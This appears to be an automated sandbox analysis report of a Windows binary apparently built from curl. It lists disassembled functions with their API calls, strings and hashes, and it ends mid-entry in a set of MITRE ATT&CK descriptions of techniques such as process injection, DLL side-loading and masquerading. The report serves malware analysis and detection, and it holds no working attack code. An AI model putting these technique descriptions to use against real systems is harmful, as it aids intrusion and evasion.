Opcode ID: 2546521ceaa10b669055b93e4f695247300489e07573c23eb4b70db07cd18158
Instruction ID: 0931b5b718d88df3f5bb592f783423535ed90745f15c49b7fdf4614e5e58b337
Opcode Fuzzy Hash: 2546521ceaa10b669055b93e4f695247300489e07573c23eb4b70db07cd18158
Instruction Fuzzy Hash: 1801F6B55087518FD310DF25D04026BBBE0BF89319F058AAEE8D8A7311E338EA498F46

Function 00405AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 004069F7
fclose.MSVCRT ref: 00406A15

Strings

Failed to open %s!, xrefs: 00406A36

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fclosefopen
String ID: Failed to open %s!
API String ID: 1280645193-3671342594
Opcode ID: 343f9f33f92926e27651ffad9c163894ae004688c88b5921dc3e94a3401e4f3c
Instruction ID: bd12f74643d2342b018d9354d3a44170bd2fbc066939c8f73cb0d14a8c5e7afa
Opcode Fuzzy Hash: 343f9f33f92926e27651ffad9c163894ae004688c88b5921dc3e94a3401e4f3c
Instruction Fuzzy Hash: C101FBB4A083858FCB30EF25C94439D7AE4AFC5348F01882E9D89AF352D77899458F5A

Function 00446A10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringnetworkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32 ref: 00446A28
strchr.MSVCRT ref: 00446A47

Strings

., xrefs: 00446A3C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: gethostnamestrchr
String ID: .
API String ID: 3518135066-248832578
Opcode ID: d0251e745ca42047d6968fc5381d4afdb50fc60a8555cd7524623a223ec7b2d7
Instruction ID: c6dcea35985b51a1b6b2f3f4c6653c8a0ded9ab80b7466bac5cdfe101c750c8a
Opcode Fuzzy Hash: d0251e745ca42047d6968fc5381d4afdb50fc60a8555cd7524623a223ec7b2d7
Instruction Fuzzy Hash: 81F0A7705083549BEB10AF68DC4434ABFE8DF063A1F01849DEC8897302E3759804C7E3

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00404E20
_strdup.MSVCRT ref: 00404E2C

Strings

-v, --verbose overrides an earlier trace/verbose option, xrefs: 00406032

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfree
String ID: -v, --verbose overrides an earlier trace/verbose option
API String ID: 1865132094-440421925
Opcode ID: 70af6d4f4e9f007b6d5e564a6adbf1387ff1c53e5100ede5046d956721f98a8a
Instruction ID: 802b987acf328914b6a70fefcf28f4ce97958cca78db60ca69dad6f70dd0413f
Opcode Fuzzy Hash: 70af6d4f4e9f007b6d5e564a6adbf1387ff1c53e5100ede5046d956721f98a8a
Instruction Fuzzy Hash: 99F017B02052449AEB309F24C9447AA7AA4BFC1309F51042FDE89AB381D77CD8859B5B

Function 0044C110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 0044C160

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0044C149
Unknown error, xrefs: 0044C11C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 6ce47408364af11892eb057a1ba410ecd99684abe24e2f158a2f8ad997ac3499
Instruction ID: d181dacab90965b21b14684bf19b55f503230c1eda1389bd8ea4fcbaf8f118f7
Opcode Fuzzy Hash: 6ce47408364af11892eb057a1ba410ecd99684abe24e2f158a2f8ad997ac3499
Instruction Fuzzy Hash: 4CF01770504641CFD304EF04E58841ABBF0FF84340F868999E4C88B329D778D8B8CB4A

Function 00405BE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00405BFD
_strdup.MSVCRT ref: 00405C21

Strings

--trace overrides an earlier trace/verbose option, xrefs: 00405C3D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfree
String ID: --trace overrides an earlier trace/verbose option
API String ID: 1865132094-4096414138
Opcode ID: a1eec84ed18281ca127b318c4735dc3144c2340daf9791b20b258af274c5b02f
Instruction ID: 28105f7515323dbeaae4fc2925a34123f1adbc3a8fb5de07e20e015b6984fecc
Opcode Fuzzy Hash: a1eec84ed18281ca127b318c4735dc3144c2340daf9791b20b258af274c5b02f
Instruction Fuzzy Hash: DEF0B7B46097848FEB30AF2589447DA76E4AF85305F00042E99999B281D7789945CB0A

Function 00405E74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00405E81
_strdup.MSVCRT ref: 00405EA5

Strings

--trace-ascii overrides an earlier trace/verbose option, xrefs: 00405EC4

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfree
String ID: --trace-ascii overrides an earlier trace/verbose option
API String ID: 1865132094-2002733778
Opcode ID: 0bf02caf06d512e21b8f3d3902b47f22da495f0b052d2c8dcb3f2bda8b524655
Instruction ID: 0189899386a6b6f10ef18dd4424e77e67300dfdc5d333ea0944e146b9db77b9c
Opcode Fuzzy Hash: 0bf02caf06d512e21b8f3d3902b47f22da495f0b052d2c8dcb3f2bda8b524655
Instruction Fuzzy Hash: 26F0DA703097848BEB309F25C94979F76E4AF81305F40052E9DDD9E3D1D7788945CB9A

Function 0043E00C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 0043E05D

Strings

Proxy-, xrefs: 0043E01C
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s", xrefs: 0043E052

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintf
String ID: %sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"$Proxy-
API String ID: 3307269620-307793260
Opcode ID: c037b9a8580870b10077898bc04e30dca43300c78e07d97dac0e91c269d1e102
Instruction ID: f1444bfc755c80857aec83a10e4667e56f001d3d9be7296d96f449d66f9c806d
Opcode Fuzzy Hash: c037b9a8580870b10077898bc04e30dca43300c78e07d97dac0e91c269d1e102
Instruction Fuzzy Hash: 23F07FB85093019FC314CF16C08045AFBE0AF98700F108C2EA9DA47301D774A945CF86

Function 00430879 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

curl_slist_free_all.CURL ref: 00430860
curl_msnprintf.CURL ref: 004308A3

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

curl_slist_append.CURL ref: 004308BB

Strings

USER,%s, xrefs: 00430886

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfcurl_mvsnprintfcurl_slist_appendcurl_slist_free_all
String ID: USER,%s
API String ID: 51632579-2267299010
Opcode ID: 956d55f7fb80033a500b4db091b90153f590c5d3df543fc0b1597ce3522ece6a
Instruction ID: d2b76dee40d16c2970987994f6e054a0febd8e2707c85ef56773c3044f354bc9
Opcode Fuzzy Hash: 956d55f7fb80033a500b4db091b90153f590c5d3df543fc0b1597ce3522ece6a
Instruction Fuzzy Hash: 47F0A5B49057049ED751DF25C444BDABBE0AF49308F44886F98DD97341EB78E484CF46

Function 004216EC Relevance: 5.1, APIs: 4, Instructions: 77stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00421710
strlen.MSVCRT ref: 00421721
strlen.MSVCRT ref: 0042174B
strlen.MSVCRT ref: 0042175C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: dbedc18ba63ecc8cfed53b8ab8879e84a1a036dd9b0c75c1ba372637e6bd202a
Instruction ID: 8a208859ea3c2a32db848d60f9ec9d255d2bff8c0fd0d76633b7430b8ccb16f1
Opcode Fuzzy Hash: dbedc18ba63ecc8cfed53b8ab8879e84a1a036dd9b0c75c1ba372637e6bd202a
Instruction Fuzzy Hash: E721AD357047114BD7209E39E480627B3E1AFE4754B948A7FE85587375E63CE8038759

Function 0044F5A0 Relevance: 5.1, APIs: 4, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0044F5CB
InitializeCriticalSection.KERNEL32 ref: 0044F603
InitializeCriticalSection.KERNEL32 ref: 0044F60F
EnterCriticalSection.KERNEL32 ref: 0044F637

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: ff06274a88eb4b5ae129b1a845f3e5afffd3c61b44d961dd320aa682c1062868
Instruction ID: 9599c2b205eb2c2862976bd88c4cdc14c75a792564f2ee7d438419fb233772ad
Opcode Fuzzy Hash: ff06274a88eb4b5ae129b1a845f3e5afffd3c61b44d961dd320aa682c1062868
Instruction Fuzzy Hash: 1E11A3715006048BFB10BFA8E88559E77B5EB40310F11403BC88947265E7B994DDCB9B

Function 004217C0 Relevance: 5.0, APIs: 4, Instructions: 50stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004217DF
strlen.MSVCRT ref: 004217F5
strlen.MSVCRT ref: 00421843
memmove.MSVCRT ref: 00421856

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$memmove
String ID:
API String ID: 1821700901-0
Opcode ID: 968a31a87675220fb456598086b90b7460bb4fa8e4fd5bd7cf9c8e7412ece5f4
Instruction ID: bcafe9287d2ef0efb79f5aa9adf91b3d988b539d4a077225ded7f6832b907254
Opcode Fuzzy Hash: 968a31a87675220fb456598086b90b7460bb4fa8e4fd5bd7cf9c8e7412ece5f4
Instruction Fuzzy Hash: 39115EB0A083559FD7117F74A8C832A7FD06F52346F8908ABD8C58B267E73D8484D76A

Function 0044C9F0 Relevance: 5.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0044CA17
free.MSVCRT ref: 0044CA61
LeaveCriticalSection.KERNEL32 ref: 0044CA6D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 7a214e3fc42d52b6e9d7b5dabbe83fc17289cb0735e76758e372b83ff593d5ef
Instruction ID: 46251318108ccb9b47f5ef2b4e275661290561142033483469fb8b8f76f75c57
Opcode Fuzzy Hash: 7a214e3fc42d52b6e9d7b5dabbe83fc17289cb0735e76758e372b83ff593d5ef
Instruction Fuzzy Hash: 64013C707012098F9740EF6CD4C962AB7E0BB44744B58857DD84DDB311EB74DD808B9A

Function 0044C8E0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0044C8F0
TlsGetValue.KERNEL32 ref: 0044C915
GetLastError.KERNEL32 ref: 0044C920
LeaveCriticalSection.KERNEL32 ref: 0044C940

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 5f483835462da164942128180ccb26389180224e5ed13984a86c5437441f4139
Instruction ID: 05ffab08ea928a3c20b5d9f6ee97fdbca2b487151059c9625631b3bdb491f8fc
Opcode Fuzzy Hash: 5f483835462da164942128180ccb26389180224e5ed13984a86c5437441f4139
Instruction Fuzzy Hash: B4F0D1B25016009FD700BFAC988815BBBB4FB84750F05043DDC9C83310EB74B858CADA

Function 0040BA80 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040BAA4
free.MSVCRT ref: 0040BABA
free.MSVCRT ref: 0040BAD0
free.MSVCRT ref: 0040BADF

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2f0c875b878a7a381799ac6b3526236f995126d12ede4cd261d8273285b6a02c
Instruction ID: 14075574c948df0751af3fbe085d3d6e601e90c497c64891b8eee156ea24422d
Opcode Fuzzy Hash: 2f0c875b878a7a381799ac6b3526236f995126d12ede4cd261d8273285b6a02c
Instruction Fuzzy Hash: FE01E8707046018BDB10AF69C5C471ABBA4EF05354F49456ED858AF386D778E8448BE9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
